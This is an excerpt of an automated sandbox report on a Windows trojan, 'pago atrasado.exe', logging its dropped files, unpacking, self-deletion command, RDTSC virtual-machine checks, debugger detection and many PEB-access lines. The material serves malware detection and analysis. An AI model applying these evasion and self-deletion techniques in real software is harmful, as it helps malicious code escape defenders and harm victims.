          Source: C:\Users\user\Desktop\pago atrasado.exe File created: C:\Users\user\AppData\Local\Temp\nsb7E27.tmp
          Source: classification engine Classification label: mal100.troj.evad.winEXE@7/2@12/5
          Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 0_2_00402053 CoCreateInstance,MultiByteToWideChar,0_2_00402053
          Source: C:\Users\user\Desktop\pago atrasado.exe File read: C:\Users\desktop.ini
          Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 0_2_00404292 GetDlgItem,SetWindowTextA,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA,0_2_00404292
          Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5060:120:WilError_01
          Source: C:\Windows\explorer.exe File read: C:\Windows\System32\drivers\etc\hosts
          Source: Binary string: colorcpl.pdbGCTL source: pago atrasado.exe, 00000001.00000002.327276708.0000000002970000.00000040.00020000.sdmp
          Source: Binary string: colorcpl.pdb source: pago atrasado.exe, 00000001.00000002.327276708.0000000002970000.00000040.00020000.sdmp
          Source: Binary string: wntdll.pdbUGP source: pago atrasado.exe, 00000000.00000003.243423683.000000000F230000.00000004.00000001.sdmp, pago atrasado.exe, 00000001.00000003.248757919.0000000000670000.00000004.00000001.sdmp, colorcpl.exe, 00000010.00000002.516530503.000000000462F000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: pago atrasado.exe, colorcpl.exe

          Data Obfuscation:

          Detected unpacking (changes PE section rights)
          Source: C:\Users\user\Desktop\pago atrasado.exe Unpacked PE file: 1.2.pago atrasado.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.ndata:W;.rsrc:R; vs .text:ER;
          Source: C:\Users\user\Desktop\pago atrasado.exe File created: C:\Users\user\AppData\Local\Temp\nsw7E57.tmp\xpbpx.dll

          Hooking and other Techniques for Hiding and Protection:

          Self deletion via cmd deleteShow sources
          Source: C:\Windows\SysWOW64\colorcpl.exeProcess created: /c del 'C:\Users\user\Desktop\pago atrasado.exe'
          Source: C:\Windows\SysWOW64\colorcpl.exeProcess created: /c del 'C:\Users\user\Desktop\pago atrasado.exe'Jump to behavior
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 0_2_10008826 RtlEncodePointer,__initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_10008826
          Source: C:\Users\user\Desktop\pago atrasado.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\colorcpl.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

          Malware Analysis System Evasion:

          Tries to detect virtualization through RDTSC time measurements
          Source: C:\Users\user\Desktop\pago atrasado.exe RDTSC instruction interceptor: First address: 0000000000408604 second address: 000000000040860A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\pago atrasado.exe RDTSC instruction interceptor: First address: 000000000040898E second address: 0000000000408994 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\colorcpl.exe RDTSC instruction interceptor: First address: 0000000002B08604 second address: 0000000002B0860A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\colorcpl.exe RDTSC instruction interceptor: First address: 0000000002B0898E second address: 0000000002B08994 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\explorer.exe TID: 5660 Thread sleep time: -30000s >= -30000s
          Source: C:\Windows\SysWOW64\colorcpl.exe TID: 5860 Thread sleep time: -36000s >= -30000s
          Source: C:\Windows\explorer.exe Last function: Thread delayed
          Source: C:\Windows\SysWOW64\colorcpl.exe Last function: Thread delayed
          Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_004088C0 rdtsc 1_2_004088C0
          Source: C:\Users\user\Desktop\pago atrasado.exe Process information queried: ProcessInformation
          Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 0_2_00405E93 FindFirstFileA,FindClose,0_2_00405E93
          Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 0_2_004054BD DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,0_2_004054BD
          Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 0_2_00402671 FindFirstFileA,0_2_00402671
          Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 0_2_1000CDA2 IsDebuggerPresent,0_2_1000CDA2
          Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 0_2_100093E8 EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,0_2_100093E8
          Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 0_2_100098B2 GetProcessHeap,0_2_100098B2
          Source: C:\Users\user\Desktop\pago atrasado.exe Process token adjusted: Debug
          Source: C:\Windows\SysWOW64\colorcpl.exe Process token adjusted: Debug
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_00A04A2C mov eax, dword ptr fs:[00000030h]1_2_00A04A2C
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_00A04A2C mov eax, dword ptr fs:[00000030h]1_2_00A04A2C
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_009C5210 mov eax, dword ptr fs:[00000030h]1_2_009C5210
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_009C5210 mov ecx, dword ptr fs:[00000030h]1_2_009C5210
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_009C5210 mov eax, dword ptr fs:[00000030h]1_2_009C5210
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_009C5210 mov eax, dword ptr fs:[00000030h]1_2_009C5210
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_009D8A0A mov eax, dword ptr fs:[00000030h]1_2_009D8A0A
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_00A8AA16 mov eax, dword ptr fs:[00000030h]1_2_00A8AA16
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_00A8AA16 mov eax, dword ptr fs:[00000030h]1_2_00A8AA16
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_00A7B260 mov eax, dword ptr fs:[00000030h]1_2_00A7B260
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_00A7B260 mov eax, dword ptr fs:[00000030h]1_2_00A7B260
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_00A98A62 mov eax, dword ptr fs:[00000030h]1_2_00A98A62
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_00A0927A mov eax, dword ptr fs:[00000030h]1_2_00A0927A
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_009C9240 mov eax, dword ptr fs:[00000030h]1_2_009C9240
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_009C9240 mov eax, dword ptr fs:[00000030h]1_2_009C9240
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_009C9240 mov eax, dword ptr fs:[00000030h]1_2_009C9240
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_009C9240 mov eax, dword ptr fs:[00000030h]1_2_009C9240
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_00A54257 mov eax, dword ptr fs:[00000030h]1_2_00A54257
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_00A8EA55 mov eax, dword ptr fs:[00000030h]1_2_00A8EA55
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_009F2397 mov eax, dword ptr fs:[00000030h]1_2_009F2397
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_00A95BA5 mov eax, dword ptr fs:[00000030h]1_2_00A95BA5
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_009FB390 mov eax, dword ptr fs:[00000030h]1_2_009FB390
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_009D1B8F mov eax, dword ptr fs:[00000030h]1_2_009D1B8F
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_009D1B8F mov eax, dword ptr fs:[00000030h]1_2_009D1B8F
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_00A8138A mov eax, dword ptr fs:[00000030h]1_2_00A8138A
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_00A7D380 mov ecx, dword ptr fs:[00000030h]1_2_00A7D380
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_009F4BAD mov eax, dword ptr fs:[00000030h]1_2_009F4BAD
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_009F4BAD mov eax, dword ptr fs:[00000030h]1_2_009F4BAD
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_009F4BAD mov eax, dword ptr fs:[00000030h]1_2_009F4BAD
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_00A453CA mov eax, dword ptr fs:[00000030h]1_2_00A453CA
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_00A453CA mov eax, dword ptr fs:[00000030h]1_2_00A453CA
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_009EDBE9 mov eax, dword ptr fs:[00000030h]1_2_009EDBE9
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_009F03E2 mov eax, dword ptr fs:[00000030h]1_2_009F03E2
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_009F03E2 mov eax, dword ptr fs:[00000030h]1_2_009F03E2
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_009F03E2 mov eax, dword ptr fs:[00000030h]1_2_009F03E2
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_009F03E2 mov eax, dword ptr fs:[00000030h]1_2_009F03E2
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_009F03E2 mov eax, dword ptr fs:[00000030h]1_2_009F03E2
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_009F03E2 mov eax, dword ptr fs:[00000030h]1_2_009F03E2
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_00A8131B mov eax, dword ptr fs:[00000030h]1_2_00A8131B
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_009CF358 mov eax, dword ptr fs:[00000030h]1_2_009CF358
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_009CDB40 mov eax, dword ptr fs:[00000030h]1_2_009CDB40
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_009F3B7A mov eax, dword ptr fs:[00000030h]1_2_009F3B7A
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_009F3B7A mov eax, dword ptr fs:[00000030h]1_2_009F3B7A
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_00A98B58 mov eax, dword ptr fs:[00000030h]1_2_00A98B58
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_009CDB60 mov ecx, dword ptr fs:[00000030h]1_2_009CDB60
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_009D849B mov eax, dword ptr fs:[00000030h]1_2_009D849B
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_00A814FB mov eax, dword ptr fs:[00000030h]1_2_00A814FB
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_00A46CF0 mov eax, dword ptr fs:[00000030h]1_2_00A46CF0
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_00A46CF0 mov eax, dword ptr fs:[00000030h]1_2_00A46CF0
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_00A46CF0 mov eax, dword ptr fs:[00000030h]1_2_00A46CF0
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_00A98CD6 mov eax, dword ptr fs:[00000030h]1_2_00A98CD6
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_00A9740D mov eax, dword ptr fs:[00000030h]1_2_00A9740D
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_00A9740D mov eax, dword ptr fs:[00000030h]1_2_00A9740D
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_00A9740D mov eax, dword ptr fs:[00000030h]1_2_00A9740D
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_00A81C06 mov eax, dword ptr fs:[00000030h]1_2_00A81C06
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_00A81C06 mov eax, dword ptr fs:[00000030h]1_2_00A81C06
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_00A81C06 mov eax, dword ptr fs:[00000030h]1_2_00A81C06
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_00A81C06 mov eax, dword ptr fs:[00000030h]1_2_00A81C06
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_00A81C06 mov eax, dword ptr fs:[00000030h]1_2_00A81C06
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_00A81C06 mov eax, dword ptr fs:[00000030h]1_2_00A81C06
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_00A81C06 mov eax, dword ptr fs:[00000030h]1_2_00A81C06
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_00A81C06 mov eax, dword ptr fs:[00000030h]1_2_00A81C06
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_00A81C06 mov eax, dword ptr fs:[00000030h]1_2_00A81C06
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_00A81C06 mov eax, dword ptr fs:[00000030h]1_2_00A81C06
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_00A81C06 mov eax, dword ptr fs:[00000030h]1_2_00A81C06
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_00A81C06 mov eax, dword ptr fs:[00000030h]1_2_00A81C06
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_00A81C06 mov eax, dword ptr fs:[00000030h]1_2_00A81C06
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_00A81C06 mov eax, dword ptr fs:[00000030h]1_2_00A81C06
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_00A46C0A mov eax, dword ptr fs:[00000030h]1_2_00A46C0A
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_00A46C0A mov eax, dword ptr fs:[00000030h]1_2_00A46C0A
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_00A46C0A mov eax, dword ptr fs:[00000030h]1_2_00A46C0A
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_00A46C0A mov eax, dword ptr fs:[00000030h]1_2_00A46C0A
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_009FBC2C mov eax, dword ptr fs:[00000030h]1_2_009FBC2C
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_009FA44B mov eax, dword ptr fs:[00000030h]1_2_009FA44B
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_009E746D mov eax, dword ptr fs:[00000030h]1_2_009E746D
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_00A5C450 mov eax, dword ptr fs:[00000030h]1_2_00A5C450
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_00A5C450 mov eax, dword ptr fs:[00000030h]1_2_00A5C450
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_009FFD9B mov eax, dword ptr fs:[00000030h]1_2_009FFD9B
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_009FFD9B mov eax, dword ptr fs:[00000030h]1_2_009FFD9B
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_00A905AC mov eax, dword ptr fs:[00000030h]1_2_00A905AC
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_00A905AC mov eax, dword ptr fs:[00000030h]1_2_00A905AC
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_009C2D8A mov eax, dword ptr fs:[00000030h]1_2_009C2D8A
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_009C2D8A mov eax, dword ptr fs:[00000030h]1_2_009C2D8A
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_009C2D8A mov eax, dword ptr fs:[00000030h]1_2_009C2D8A
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_009C2D8A mov eax, dword ptr fs:[00000030h]1_2_009C2D8A
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_009C2D8A mov eax, dword ptr fs:[00000030h]1_2_009C2D8A
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_009F2581 mov eax, dword ptr fs:[00000030h]1_2_009F2581
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_009F2581 mov eax, dword ptr fs:[00000030h]1_2_009F2581
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_009F2581 mov eax, dword ptr fs:[00000030h]1_2_009F2581
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_009F2581 mov eax, dword ptr fs:[00000030h]1_2_009F2581
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_009F1DB5 mov eax, dword ptr fs:[00000030h]1_2_009F1DB5
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_009F1DB5 mov eax, dword ptr fs:[00000030h]1_2_009F1DB5
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_009F1DB5 mov eax, dword ptr fs:[00000030h]1_2_009F1DB5
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_009F35A1 mov eax, dword ptr fs:[00000030h]1_2_009F35A1
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_00A8FDE2 mov eax, dword ptr fs:[00000030h]1_2_00A8FDE2
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_00A8FDE2 mov eax, dword ptr fs:[00000030h]1_2_00A8FDE2
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_00A8FDE2 mov eax, dword ptr fs:[00000030h]1_2_00A8FDE2
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_00A8FDE2 mov eax, dword ptr fs:[00000030h]1_2_00A8FDE2
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_00A78DF1 mov eax, dword ptr fs:[00000030h]1_2_00A78DF1
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_00A46DC9 mov eax, dword ptr fs:[00000030h]1_2_00A46DC9
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_00A46DC9 mov eax, dword ptr fs:[00000030h]1_2_00A46DC9
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_00A46DC9 mov eax, dword ptr fs:[00000030h]1_2_00A46DC9
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_00A46DC9 mov ecx, dword ptr fs:[00000030h]1_2_00A46DC9
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_00A46DC9 mov eax, dword ptr fs:[00000030h]1_2_00A46DC9
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_00A46DC9 mov eax, dword ptr fs:[00000030h]1_2_00A46DC9
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_009DD5E0 mov eax, dword ptr fs:[00000030h]1_2_009DD5E0
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_009DD5E0 mov eax, dword ptr fs:[00000030h]1_2_009DD5E0
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_00A8E539 mov eax, dword ptr fs:[00000030h]1_2_00A8E539
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_00A4A537 mov eax, dword ptr fs:[00000030h]1_2_00A4A537
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_00A98D34 mov eax, dword ptr fs:[00000030h]1_2_00A98D34
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_009F4D3B mov eax, dword ptr fs:[00000030h]1_2_009F4D3B
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_009F4D3B mov eax, dword ptr fs:[00000030h]1_2_009F4D3B
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_009F4D3B mov eax, dword ptr fs:[00000030h]1_2_009F4D3B
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_009D3D34 mov eax, dword ptr fs:[00000030h]1_2_009D3D34
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_009D3D34 mov eax, dword ptr fs:[00000030h]1_2_009D3D34
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_009D3D34 mov eax, dword ptr fs:[00000030h]1_2_009D3D34
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_009D3D34 mov eax, dword ptr fs:[00000030h]1_2_009D3D34
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_009D3D34 mov eax, dword ptr fs:[00000030h]1_2_009D3D34
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_009D3D34 mov eax, dword ptr fs:[00000030h]1_2_009D3D34
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_009D3D34 mov eax, dword ptr fs:[00000030h]1_2_009D3D34
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_009D3D34 mov eax, dword ptr fs:[00000030h]1_2_009D3D34
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_009D3D34 mov eax, dword ptr fs:[00000030h]1_2_009D3D34
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_009D3D34 mov eax, dword ptr fs:[00000030h]1_2_009D3D34
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_009D3D34 mov eax, dword ptr fs:[00000030h]1_2_009D3D34
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_009D3D34 mov eax, dword ptr fs:[00000030h]1_2_009D3D34
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_009D3D34 mov eax, dword ptr fs:[00000030h]1_2_009D3D34
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_009CAD30 mov eax, dword ptr fs:[00000030h]1_2_009CAD30
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_009E7D50 mov eax, dword ptr fs:[00000030h]1_2_009E7D50
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_00A03D43 mov eax, dword ptr fs:[00000030h]1_2_00A03D43
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_00A43540 mov eax, dword ptr fs:[00000030h]1_2_00A43540
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_009EC577 mov eax, dword ptr fs:[00000030h]1_2_009EC577
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_009EC577 mov eax, dword ptr fs:[00000030h]1_2_009EC577
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_00A446A7 mov eax, dword ptr fs:[00000030h]1_2_00A446A7
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_00A90EA5 mov eax, dword ptr fs:[00000030h]1_2_00A90EA5
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_00A90EA5 mov eax, dword ptr fs:[00000030h]1_2_00A90EA5
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_00A90EA5 mov eax, dword ptr fs:[00000030h]1_2_00A90EA5
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_00A5FE87 mov eax, dword ptr fs:[00000030h]1_2_00A5FE87
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_009F36CC mov eax, dword ptr fs:[00000030h]1_2_009F36CC
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_00A7FEC0 mov eax, dword ptr fs:[00000030h]1_2_00A7FEC0
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_00A08EC7 mov eax, dword ptr fs:[00000030h]1_2_00A08EC7
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_009F16E0 mov ecx, dword ptr fs:[00000030h]1_2_009F16E0
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_00A98ED6 mov eax, dword ptr fs:[00000030h]1_2_00A98ED6
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_009D76E2 mov eax, dword ptr fs:[00000030h]1_2_009D76E2
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_009FA61C mov eax, dword ptr fs:[00000030h]1_2_009FA61C
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_009FA61C mov eax, dword ptr fs:[00000030h]1_2_009FA61C
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_00A7FE3F mov eax, dword ptr fs:[00000030h]1_2_00A7FE3F
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_009CC600 mov eax, dword ptr fs:[00000030h]1_2_009CC600
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_009CC600 mov eax, dword ptr fs:[00000030h]1_2_009CC600
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_009CC600 mov eax, dword ptr fs:[00000030h]1_2_009CC600
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_009F8E00 mov eax, dword ptr fs:[00000030h]1_2_009F8E00
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_00A81608 mov eax, dword ptr fs:[00000030h]1_2_00A81608
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_009CE620 mov eax, dword ptr fs:[00000030h]1_2_009CE620
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_009D7E41 mov eax, dword ptr fs:[00000030h]1_2_009D7E41
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_009D7E41 mov eax, dword ptr fs:[00000030h]1_2_009D7E41
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_009D7E41 mov eax, dword ptr fs:[00000030h]1_2_009D7E41
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_009D7E41 mov eax, dword ptr fs:[00000030h]1_2_009D7E41
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_009D7E41 mov eax, dword ptr fs:[00000030h]1_2_009D7E41
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_009D7E41 mov eax, dword ptr fs:[00000030h]1_2_009D7E41
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_00A8AE44 mov eax, dword ptr fs:[00000030h]1_2_00A8AE44
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_00A8AE44 mov eax, dword ptr fs:[00000030h]1_2_00A8AE44
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_009EAE73 mov eax, dword ptr fs:[00000030h]1_2_009EAE73
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_009EAE73 mov eax, dword ptr fs:[00000030h]1_2_009EAE73
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_009EAE73 mov eax, dword ptr fs:[00000030h]1_2_009EAE73
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_009EAE73 mov eax, dword ptr fs:[00000030h]1_2_009EAE73
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_009EAE73 mov eax, dword ptr fs:[00000030h]1_2_009EAE73
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_009D766D mov eax, dword ptr fs:[00000030h]1_2_009D766D
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_009D8794 mov eax, dword ptr fs:[00000030h]1_2_009D8794
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_00A47794 mov eax, dword ptr fs:[00000030h]1_2_00A47794
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_00A47794 mov eax, dword ptr fs:[00000030h]1_2_00A47794
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_00A47794 mov eax, dword ptr fs:[00000030h]1_2_00A47794
